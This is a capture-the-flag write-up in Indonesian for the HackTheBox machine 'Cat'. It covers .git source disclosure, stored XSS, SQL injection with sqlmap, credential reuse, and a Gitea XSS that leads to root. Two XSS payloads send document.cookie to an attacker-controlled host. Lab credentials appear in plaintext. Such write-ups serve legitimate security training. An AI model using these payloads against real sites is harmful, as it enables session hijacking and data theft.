Writeup HTB Cat Linux Medium
Writeup Htb Cat
Writeup HTB Cat

Ini adalah writeup HTB Cat Linux Medium yang dibuat pada tahun 2025. Panduan ini akan menjelaskan proses eksploitasi mesin Linux tingkat Medium secara menyeluruh.

Dalam HTB writeup 2025 ini, kita akan mempelajari berbagai teknik seperti enumerasi, XSS, SQL injection, dan privilege escalation hingga akses root.

Daftar Isi

  1. Informasi Umum Machine
  2. Enumeration
  3. Eksploitasi
  4. Privilege Escalation
  5. Root Flag
  6. Kesimpulan
  7. Artikel Terkait

Informasi Umum Machine

  • Nama Mesin: Cat
  • Platform: HackTheBox (HTB)
  • Sistem Operasi: Linux
  • Tingkat Kesulitan: Medium
  • IP Target: 10.10.11.53

Eksploitasi - HTB Cat Linux Medium Writeup

Enumeration

Nmap Scan

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Gobuster / Dirsearch

Ditemukan direktori tersembunyi seperti .git/, /config.php, dan /admin.php yang redirect ke /join.php.

GitTools

Menggunakan gitdumper dan extractor dari GitTools untuk mengekstrak source code aplikasi PHP yang tidak dihapus dari direktori .git.

Eksploitasi

Stored XSS (join.php)

Aplikasi menyimpan input user secara langsung tanpa validasi ke dalam database. Payload XSS dimasukkan ke field username:

<script>document.location='http://10.10.xx.xx:4444/?c='+document.cookie;</script>

SQL Injection (accept_cat.php)

SQLi terdapat pada parameter catName. Menggunakan SQLMap dengan cookies admin yang didapat via XSS:

sqlmap -r req.txt -p catName --level 3 --risk 3 --batch --random-agent --dbms=sqlite --dump

SSH Access

Ditemukan kredensial:

  • rosa: soyunaprincesarosa
ssh rosa@10.10.11.53

Privilege Escalation

Apache Access Log

Melalui /var/log/apache2/access.log, ditemukan kredensial user axel:

axel:aNdZwgC4tI9gnVXv_e3Q

Port Forwarding ke Gitea

Ada service Gitea pada localhost:3000, dapat diakses melalui port forwarding:

ssh -L 3000:127.0.0.1:3000 axel@10.10.11.53

XSS di Gitea

Gitea rentan terhadap XSS. Mengirim email ke jobert@localhost dengan payload XSS yang membaca README.md pada repo privat.

<a href="javascript:fetch('http://10.10.xx.xx:4444/?d='+encodeURIComponent(btoa(document.cookie)))">XSS test</a>

Root Credentials

Dari hasil XSS, ditemukan source index.php yang berisi kredensial Basic Auth:

Username: admin
Password: IKw75eR0MR7CMIxhH0

Login ke Root

su root
Password: IKw75eR0MR7CMIxhH0

Root Flag

cat /root/root.txt

[TERCENSORED - FLAG DISEMBUNYIKAN]

Kesimpulan

Mesin HTB Cat Linux Medium menunjukkan pentingnya menjaga direktori sensitif seperti .git agar tidak terekspos.

Melalui kombinasi source code disclosure, XSS, dan SQL Injection, kami mendapatkan akses administratif dan kemudian root.

Writeup HTB Cat ini termasuk dalam HTB writeup 2025 yang memperlihatkan kerentanan nyata dalam aplikasi web dan layanan internal seperti Gitea.